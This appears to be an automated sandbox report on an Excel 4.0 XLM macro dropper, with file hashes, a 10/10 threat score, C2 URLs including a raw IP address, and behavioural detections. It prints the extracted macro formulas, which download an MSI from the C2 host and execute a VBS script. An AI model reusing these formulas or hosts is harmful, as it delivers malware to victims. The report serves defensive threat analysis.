General

  • Target

    efcb1c6af3fe55ca0a9e89c745715251

  • Size

    6KB

  • Sample

    231222-tygh2sfhbm

  • MD5

    efcb1c6af3fe55ca0a9e89c745715251

  • SHA1

    a6dc87522ae3acc43e124179192ccd035f9675fc

  • SHA256

    0e991ce3388d4f678241901e8c617fbc7c19a37d2e8ba480e4e81697713885eb

  • SHA512

    525b1a651159301c159758516552b7e439a7316426dfd46a757fb0927ad09b2344ab721d20354b0a09f3fc0e4b37049220e1c7e6eda244a7f8b891f221d81053

  • SSDEEP

    192:NDSkuSmbrA2OmmfRB8UhHFBFYuPb98yNQ+Vn7kJxu:NnuHM2wj1FY6b98yNLn7kJxu

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      efcb1c6af3fe55ca0a9e89c745715251

    • Size

      6KB

    • MD5

      efcb1c6af3fe55ca0a9e89c745715251

    • SHA1

      a6dc87522ae3acc43e124179192ccd035f9675fc

    • SHA256

      0e991ce3388d4f678241901e8c617fbc7c19a37d2e8ba480e4e81697713885eb

    • SHA512

      525b1a651159301c159758516552b7e439a7316426dfd46a757fb0927ad09b2344ab721d20354b0a09f3fc0e4b37049220e1c7e6eda244a7f8b891f221d81053

    • SSDEEP

      192:NDSkuSmbrA2OmmfRB8UhHFBFYuPb98yNQ+Vn7kJxu:NnuHM2wj1FY6b98yNLn7kJxu

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks